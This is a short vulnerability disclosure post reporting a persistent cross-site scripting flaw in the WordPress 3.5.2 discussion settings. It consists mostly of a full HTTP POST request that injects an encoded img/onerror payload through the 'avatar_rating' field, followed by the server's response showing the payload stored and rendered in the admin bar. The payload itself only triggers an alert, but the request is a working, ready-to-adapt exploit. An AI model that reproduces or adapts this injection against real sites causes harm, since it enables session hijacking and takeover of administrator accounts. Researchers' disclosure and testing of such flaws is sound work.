[EN] Wordpress 3.5.2 - Persistent XSS

Hi,

another persistent XSS mentioned here is located in 'avatar' section in Wordpress.

Check it out:

---< code >---

POST /wp/wordpress/wp-admin/options.php HTTP/1.1
Host: 192.168.255.105
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 608

option_page=discussion&action=update&_wpnonce=

369fdac5f5&_wp_http_referer=%2Fwp%2Fwordpress%2Fwp-admin%2F

options-discussion.php%3Fsettings-updated%3Dtrue&default_ping_

status=open&default_comment_status=open&require_name_email=1&

close_comments_days_old=14&thread_comments=1&thread_comments_depth=5&

comments_per_page=0&default_comments_page=newest&comment_order=asc&

comments_notify=1&moderation_notify=1&comment_whitelist=1&

comment_max_links=2&moderation_keys=asd&blacklist_keys=asd&

show_avatars=1&

avatar_rating='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(12345)"%3e&

avatar_default=asdads&submit=Save+Changes 

---< code >---

Response with stored XSS:

---< code >--- 

<li id="wp-admin-bar-new-user"><a class="ab-item"  
href="http://192.168.255.105/wp/wordpress/wp-admin/user-new.php">User</a> 
 </li></ul></div>  </li></ul><ul id="wp-admin-bar-top-secondary" class="ab-top-secondary ab-top-menu">
<li id="wp-admin-bar-my-account" class="menupop with-avatar"><a class="ab-item" 
 aria-haspopup="true" href="http://192.168.255.105/wp/wordpress/wp-admin/profile.php" 
 title="My Account">Howdy, admin<img alt='' 
 src='http://0.gravatar.com/avatar/0ae4c976cc014ca98dff551be4794e02?s=16&amp;d=asdads&amp;r='>"><img/src="x"/onerror="alert(12345)">'
 class='avatar avatar-16 photo' height='16' width='16' /></a><div class="ab-sub-wrapper"><ul id="wp-admin-bar-user-actions" class="ab-submenu">
<li id="wp-admin-bar-user-info"><a class="ab-item" 
---< code >--- 


Enjoy ;)

o/